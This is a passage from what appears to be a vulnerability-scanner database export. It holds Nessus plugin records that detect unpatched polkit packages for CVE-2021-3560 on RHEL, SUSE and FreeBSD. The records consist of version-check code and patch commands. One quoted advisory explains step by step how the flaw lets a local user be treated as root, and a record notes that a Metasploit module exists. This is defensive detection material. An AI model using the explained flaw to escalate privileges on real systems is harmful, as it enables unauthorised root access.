'content/eus/rhel8/8.6/aarch64/highavailability/debug',\n 'content/eus/rhel8/8.6/aarch64/highavailability/os',\n 'content/eus/rhel8/8.6/aarch64/highavailability/source/SRPMS',\n 'content/eus/rhel8/8.6/aarch64/supplementary/debug',\n 'content/eus/rhel8/8.6/aarch64/supplementary/os',\n 'content/eus/rhel8/8.6/aarch64/supplementary/source/SRPMS',\n 'content/eus/rhel8/8.6/ppc64le/appstream/debug',\n 'content/eus/rhel8/8.6/ppc64le/appstream/os',\n 'content/eus/rhel8/8.6/ppc64le/appstream/source/SRPMS',\n 'content/eus/rhel8/8.6/ppc64le/baseos/debug',\n 'content/eus/rhel8/8.6/ppc64le/baseos/os',\n 'content/eus/rhel8/8.6/ppc64le/baseos/source/SRPMS',\n 'content/eus/rhel8/8.6/ppc64le/codeready-builder/debug',\n 'content/eus/rhel8/8.6/ppc64le/codeready-builder/os',\n 'content/eus/rhel8/8.6/ppc64le/codeready-builder/source/SRPMS',\n 'content/eus/rhel8/8.6/ppc64le/highavailability/debug',\n 'content/eus/rhel8/8.6/ppc64le/highavailability/os',\n 'content/eus/rhel8/8.6/ppc64le/highavailability/source/SRPMS',\n 'content/eus/rhel8/8.6/ppc64le/resilientstorage/debug',\n 'content/eus/rhel8/8.6/ppc64le/resilientstorage/os',\n 'content/eus/rhel8/8.6/ppc64le/resilientstorage/source/SRPMS',\n 'content/eus/rhel8/8.6/ppc64le/sap-solutions/debug',\n 'content/eus/rhel8/8.6/ppc64le/sap-solutions/os',\n 'content/eus/rhel8/8.6/ppc64le/sap-solutions/source/SRPMS',\n 'content/eus/rhel8/8.6/ppc64le/sap/debug',\n 'content/eus/rhel8/8.6/ppc64le/sap/os',\n 'content/eus/rhel8/8.6/ppc64le/sap/source/SRPMS',\n 'content/eus/rhel8/8.6/ppc64le/supplementary/debug',\n 'content/eus/rhel8/8.6/ppc64le/supplementary/os',\n 'content/eus/rhel8/8.6/ppc64le/supplementary/source/SRPMS',\n 'content/eus/rhel8/8.6/s390x/appstream/debug',\n 'content/eus/rhel8/8.6/s390x/appstream/os',\n 'content/eus/rhel8/8.6/s390x/appstream/source/SRPMS',\n 'content/eus/rhel8/8.6/s390x/baseos/debug',\n 'content/eus/rhel8/8.6/s390x/baseos/os',\n 'content/eus/rhel8/8.6/s390x/baseos/source/SRPMS',\n 'content/eus/rhel8/8.6/s390x/codeready-builder/debug',\n 'content/eus/rhel8/8.6/s390x/codeready-builder/os',\n 'content/eus/rhel8/8.6/s390x/codeready-builder/source/SRPMS',\n 'content/eus/rhel8/8.6/s390x/highavailability/debug',\n 'content/eus/rhel8/8.6/s390x/highavailability/os',\n 'content/eus/rhel8/8.6/s390x/highavailability/source/SRPMS',\n 'content/eus/rhel8/8.6/s390x/resilientstorage/debug',\n 'content/eus/rhel8/8.6/s390x/resilientstorage/os',\n 'content/eus/rhel8/8.6/s390x/resilientstorage/source/SRPMS',\n 'content/eus/rhel8/8.6/s390x/sap/debug',\n 'content/eus/rhel8/8.6/s390x/sap/os',\n 'content/eus/rhel8/8.6/s390x/sap/source/SRPMS',\n 'content/eus/rhel8/8.6/s390x/supplementary/debug',\n 'content/eus/rhel8/8.6/s390x/supplementary/os',\n 'content/eus/rhel8/8.6/s390x/supplementary/source/SRPMS',\n 'content/eus/rhel8/8.6/x86_64/appstream/debug',\n 'content/eus/rhel8/8.6/x86_64/appstream/os',\n 'content/eus/rhel8/8.6/x86_64/appstream/source/SRPMS',\n 'content/eus/rhel8/8.6/x86_64/baseos/debug',\n 'content/eus/rhel8/8.6/x86_64/baseos/os',\n 'content/eus/rhel8/8.6/x86_64/baseos/source/SRPMS',\n 'content/eus/rhel8/8.6/x86_64/codeready-builder/debug',\n 'content/eus/rhel8/8.6/x86_64/codeready-builder/os',\n 'content/eus/rhel8/8.6/x86_64/codeready-builder/source/SRPMS',\n 'content/eus/rhel8/8.6/x86_64/highavailability/debug',\n 'content/eus/rhel8/8.6/x86_64/highavailability/os',\n 'content/eus/rhel8/8.6/x86_64/highavailability/source/SRPMS',\n 'content/eus/rhel8/8.6/x86_64/resilientstorage/debug',\n 'content/eus/rhel8/8.6/x86_64/resilientstorage/os',\n 'content/eus/rhel8/8.6/x86_64/resilientstorage/source/SRPMS',\n 'content/eus/rhel8/8.6/x86_64/sap-solutions/debug',\n 'content/eus/rhel8/8.6/x86_64/sap-solutions/os',\n 'content/eus/rhel8/8.6/x86_64/sap-solutions/source/SRPMS',\n 'content/eus/rhel8/8.6/x86_64/sap/debug',\n 'content/eus/rhel8/8.6/x86_64/sap/os',\n 'content/eus/rhel8/8.6/x86_64/sap/source/SRPMS',\n 'content/eus/rhel8/8.6/x86_64/supplementary/debug',\n 'content/eus/rhel8/8.6/x86_64/supplementary/os',\n 'content/eus/rhel8/8.6/x86_64/supplementary/source/SRPMS',\n 'content/tus/rhel8/8.6/x86_64/appstream/debug',\n 'content/tus/rhel8/8.6/x86_64/appstream/os',\n 'content/tus/rhel8/8.6/x86_64/appstream/source/SRPMS',\n 'content/tus/rhel8/8.6/x86_64/baseos/debug',\n 'content/tus/rhel8/8.6/x86_64/baseos/os',\n 'content/tus/rhel8/8.6/x86_64/baseos/source/SRPMS',\n 'content/tus/rhel8/8.6/x86_64/highavailability/debug',\n 'content/tus/rhel8/8.6/x86_64/highavailability/os',\n 'content/tus/rhel8/8.6/x86_64/highavailability/source/SRPMS',\n 'content/tus/rhel8/8.6/x86_64/rt/os',\n 'content/tus/rhel8/8.6/x86_64/rt/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'polkit-0.115-11.el8_4.1', 'sp':'6', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-devel-0.115-11.el8_4.1', 'sp':'6', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-docs-0.115-11.el8_4.1', 'sp':'6', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-libs-0.115-11.el8_4.1', 'sp':'6', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n ]\n },\n {\n 'repo_relative_urls': [\n 'content/dist/rhel8/8/aarch64/appstream/debug',\n 'content/dist/rhel8/8/aarch64/appstream/os',\n 'content/dist/rhel8/8/aarch64/appstream/source/SRPMS',\n 'content/dist/rhel8/8/aarch64/baseos/debug',\n 'content/dist/rhel8/8/aarch64/baseos/os',\n 'content/dist/rhel8/8/aarch64/baseos/source/SRPMS',\n 'content/dist/rhel8/8/aarch64/codeready-builder/debug',\n 'content/dist/rhel8/8/aarch64/codeready-builder/os',\n 'content/dist/rhel8/8/aarch64/codeready-builder/source/SRPMS',\n 'content/dist/rhel8/8/aarch64/highavailability/debug',\n 'content/dist/rhel8/8/aarch64/highavailability/os',\n 'content/dist/rhel8/8/aarch64/highavailability/source/SRPMS',\n 'content/dist/rhel8/8/aarch64/supplementary/debug',\n 'content/dist/rhel8/8/aarch64/supplementary/os',\n 'content/dist/rhel8/8/aarch64/supplementary/source/SRPMS',\n 'content/dist/rhel8/8/ppc64le/appstream/debug',\n 'content/dist/rhel8/8/ppc64le/appstream/os',\n 'content/dist/rhel8/8/ppc64le/appstream/source/SRPMS',\n 'content/dist/rhel8/8/ppc64le/baseos/debug',\n 'content/dist/rhel8/8/ppc64le/baseos/os',\n 'content/dist/rhel8/8/ppc64le/baseos/source/SRPMS',\n 'content/dist/rhel8/8/ppc64le/codeready-builder/debug',\n 'content/dist/rhel8/8/ppc64le/codeready-builder/os',\n 'content/dist/rhel8/8/ppc64le/codeready-builder/source/SRPMS',\n 'content/dist/rhel8/8/ppc64le/highavailability/debug',\n 'content/dist/rhel8/8/ppc64le/highavailability/os',\n 'content/dist/rhel8/8/ppc64le/highavailability/source/SRPMS',\n 'content/dist/rhel8/8/ppc64le/resilientstorage/debug',\n 'content/dist/rhel8/8/ppc64le/resilientstorage/os',\n 'content/dist/rhel8/8/ppc64le/resilientstorage/source/SRPMS',\n 'content/dist/rhel8/8/ppc64le/sap-solutions/debug',\n 'content/dist/rhel8/8/ppc64le/sap-solutions/os',\n 'content/dist/rhel8/8/ppc64le/sap-solutions/source/SRPMS',\n 'content/dist/rhel8/8/ppc64le/sap/debug',\n 'content/dist/rhel8/8/ppc64le/sap/os',\n 'content/dist/rhel8/8/ppc64le/sap/source/SRPMS',\n 'content/dist/rhel8/8/ppc64le/supplementary/debug',\n 'content/dist/rhel8/8/ppc64le/supplementary/os',\n 'content/dist/rhel8/8/ppc64le/supplementary/source/SRPMS',\n 'content/dist/rhel8/8/s390x/appstream/debug',\n 'content/dist/rhel8/8/s390x/appstream/os',\n 'content/dist/rhel8/8/s390x/appstream/source/SRPMS',\n 'content/dist/rhel8/8/s390x/baseos/debug',\n 'content/dist/rhel8/8/s390x/baseos/os',\n 'content/dist/rhel8/8/s390x/baseos/source/SRPMS',\n 'content/dist/rhel8/8/s390x/codeready-builder/debug',\n 'content/dist/rhel8/8/s390x/codeready-builder/os',\n 'content/dist/rhel8/8/s390x/codeready-builder/source/SRPMS',\n 'content/dist/rhel8/8/s390x/highavailability/debug',\n 'content/dist/rhel8/8/s390x/highavailability/os',\n 'content/dist/rhel8/8/s390x/highavailability/source/SRPMS',\n 'content/dist/rhel8/8/s390x/resilientstorage/debug',\n 'content/dist/rhel8/8/s390x/resilientstorage/os',\n 'content/dist/rhel8/8/s390x/resilientstorage/source/SRPMS',\n 'content/dist/rhel8/8/s390x/sap/debug',\n 'content/dist/rhel8/8/s390x/sap/os',\n 'content/dist/rhel8/8/s390x/sap/source/SRPMS',\n 'content/dist/rhel8/8/s390x/supplementary/debug',\n 'content/dist/rhel8/8/s390x/supplementary/os',\n 'content/dist/rhel8/8/s390x/supplementary/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/appstream/debug',\n 'content/dist/rhel8/8/x86_64/appstream/os',\n 'content/dist/rhel8/8/x86_64/appstream/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/baseos/debug',\n 'content/dist/rhel8/8/x86_64/baseos/os',\n 'content/dist/rhel8/8/x86_64/baseos/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/codeready-builder/debug',\n 'content/dist/rhel8/8/x86_64/codeready-builder/os',\n 'content/dist/rhel8/8/x86_64/codeready-builder/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/highavailability/debug',\n 'content/dist/rhel8/8/x86_64/highavailability/os',\n 'content/dist/rhel8/8/x86_64/highavailability/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/nfv/debug',\n 'content/dist/rhel8/8/x86_64/nfv/os',\n 'content/dist/rhel8/8/x86_64/nfv/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/resilientstorage/debug',\n 'content/dist/rhel8/8/x86_64/resilientstorage/os',\n 'content/dist/rhel8/8/x86_64/resilientstorage/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/rt/debug',\n 'content/dist/rhel8/8/x86_64/rt/os',\n 'content/dist/rhel8/8/x86_64/rt/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/sap-solutions/debug',\n 'content/dist/rhel8/8/x86_64/sap-solutions/os',\n 'content/dist/rhel8/8/x86_64/sap-solutions/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/sap/debug',\n 'content/dist/rhel8/8/x86_64/sap/os',\n 'content/dist/rhel8/8/x86_64/sap/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/supplementary/debug',\n 'content/dist/rhel8/8/x86_64/supplementary/os',\n 'content/dist/rhel8/8/x86_64/supplementary/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'polkit-0.115-11.el8_4.1', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-devel-0.115-11.el8_4.1', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-docs-0.115-11.el8_4.1', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-libs-0.115-11.el8_4.1', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n var enterprise_linux_flag = rhel_repo_urls_has_content_dist_rhel(repo_urls:repo_relative_urls);\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp']) && !enterprise_linux_flag) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'polkit / polkit-devel / polkit-docs / polkit-libs');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-02T14:51:38", "description": "This update for polkit fixes the following issues :\n\nCVE-2021-3560: Fixed a local privilege escalation using polkit_system_bus_name_get_creds_sync() (bsc#1186497).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2021-06-04T00:00:00", "type": "nessus", "title": "SUSE SLES15 Security Update : polkit (SUSE-SU-2021:1844-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libpolkit0", "p-cpe:/a:novell:suse_linux:libpolkit0-debuginfo", "p-cpe:/a:novell:suse_linux:polkit", "p-cpe:/a:novell:suse_linux:polkit-debuginfo", "p-cpe:/a:novell:suse_linux:polkit-debugsource", "p-cpe:/a:novell:suse_linux:polkit-devel", "p-cpe:/a:novell:suse_linux:polkit-devel-debuginfo", "p-cpe:/a:novell:suse_linux:typelib-1_0-polkit", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2021-1844-1.NASL", "href": "https://www.tenable.com/plugins/nessus/150270", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2021:1844-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150270);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"SUSE SLES15 Security Update : polkit (SUSE-SU-2021:1844-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for polkit fixes the following issues :\n\nCVE-2021-3560: Fixed a local privilege escalation using\npolkit_system_bus_name_get_creds_sync() (bsc#1186497).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1186497\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-3560/\");\n # https://www.suse.com/support/update/announcement/2021/suse-su-20211844-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?812de0ab\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Manager Server 4.0 :\n\nzypper in -t patch\nSUSE-SLE-Product-SUSE-Manager-Server-4.0-2021-1844=1\n\nSUSE Manager Retail Branch Server 4.0 :\n\nzypper in -t patch\nSUSE-SLE-Product-SUSE-Manager-Retail-Branch-Server-4.0-2021-1844=1\n\nSUSE Manager Proxy 4.0 :\n\nzypper in -t patch SUSE-SLE-Product-SUSE-Manager-Proxy-4.0-2021-1844=1\n\nSUSE Linux Enterprise Server for SAP 15-SP1 :\n\nzypper in -t patch SUSE-SLE-Product-SLES_SAP-15-SP1-2021-1844=1\n\nSUSE Linux Enterprise Server for SAP 15 :\n\nzypper in -t patch SUSE-SLE-Product-SLES_SAP-15-2021-1844=1\n\nSUSE Linux Enterprise Server 15-SP1-LTSS :\n\nzypper in -t patch SUSE-SLE-Product-SLES-15-SP1-LTSS-2021-1844=1\n\nSUSE Linux Enterprise Server 15-SP1-BCL :\n\nzypper in -t patch SUSE-SLE-Product-SLES-15-SP1-BCL-2021-1844=1\n\nSUSE Linux Enterprise Server 15-LTSS :\n\nzypper in -t patch SUSE-SLE-Product-SLES-15-2021-1844=1\n\nSUSE Linux Enterprise High Performance Computing 15-SP1-LTSS :\n\nzypper in -t patch SUSE-SLE-Product-HPC-15-SP1-LTSS-2021-1844=1\n\nSUSE Linux Enterprise High Performance Computing 15-SP1-ESPOS :\n\nzypper in -t patch SUSE-SLE-Product-HPC-15-SP1-ESPOS-2021-1844=1\n\nSUSE Linux Enterprise High Performance Computing 15-LTSS :\n\nzypper in -t patch SUSE-SLE-Product-HPC-15-2021-1844=1\n\nSUSE Linux Enterprise High Performance Computing 15-ESPOS :\n\nzypper in -t patch SUSE-SLE-Product-HPC-15-2021-1844=1\n\nSUSE Enterprise Storage 6 :\n\nzypper in -t patch SUSE-Storage-6-2021-1844=1\n\nSUSE CaaS Platform 4.0 :\n\nTo install this update, use the SUSE CaaS Platform 'skuba' tool. I\nwill inform you if it detects new updates and let you then trigger\nupdating of the complete cluster in a controlled way.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpolkit0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpolkit0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:polkit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:polkit-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:polkit-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:polkit-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-Polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0|1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0/1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libpolkit0-0.114-3.12.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libpolkit0-debuginfo-0.114-3.12.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"polkit-0.114-3.12.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"polkit-debuginfo-0.114-3.12.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"polkit-debugsource-0.114-3.12.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"polkit-devel-0.114-3.12.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"polkit-devel-debuginfo-0.114-3.12.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"typelib-1_0-Polkit-1_0-0.114-3.12.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libpolkit0-0.114-3.12.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libpolkit0-debuginfo-0.114-3.12.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"polkit-0.114-3.12.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"polkit-debuginfo-0.114-3.12.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"polkit-debugsource-0.114-3.12.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"polkit-devel-0.114-3.12.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"polkit-devel-debuginfo-0.114-3.12.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"typelib-1_0-Polkit-1_0-0.114-3.12.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"polkit\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-02T14:51:22", "description": "Cedric Buissart reports :\n\nThe function polkit_system_bus_name_get_creds_sync is used to get the uid and pid of the process requesting the action. It does this by sending the unique bus name of the requesting process, which is typically something like ':1.96', to dbus-daemon. These unique names are assigned and managed by dbus-daemon and cannot be forged, so this is a good way to check the privileges of the requesting process.\n\nThe vulnerability happens when the requesting process disconnects from dbus-daemon just before the call to polkit_system_bus_name_get_creds_sync starts. In this scenario, the unique bus name is no longer valid, so dbus-daemon sends back an error reply. This error case is handled in polkit_system_bus_name_get_creds_sync by setting the value of the error parameter, but it still returns TRUE, rather than FALSE. This behavior means that all callers of polkit_system_bus_name_get_creds_sync need to carefully check whether an error was set. If the calling function forgets to check for errors then it will think that the uid of the requesting process is 0 (because the AsyncGetBusNameCredsData struct is zero initialized). In other words, it will think that the action was requested by a root process, and will therefore allow it.", "cvss3": {}, "published": "2021-06-07T00:00:00", "type": "nessus", "title": "FreeBSD : polkit -- local privilege escalation using polkit_system_bus_name_get_creds_sync (36a35d83-c560-11eb-84ab-e0d55e2a8bf9)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:polkit", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_36A35D83C56011EB84ABE0D55E2A8BF9.NASL", "href": "https://www.tenable.com/plugins/nessus/150314", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150314);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"FreeBSD : polkit -- local privilege escalation using polkit_system_bus_name_get_creds_sync (36a35d83-c560-11eb-84ab-e0d55e2a8bf9)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Cedric Buissart reports :\n\nThe function polkit_system_bus_name_get_creds_sync is used to get the\nuid and pid of the process requesting the action. It does 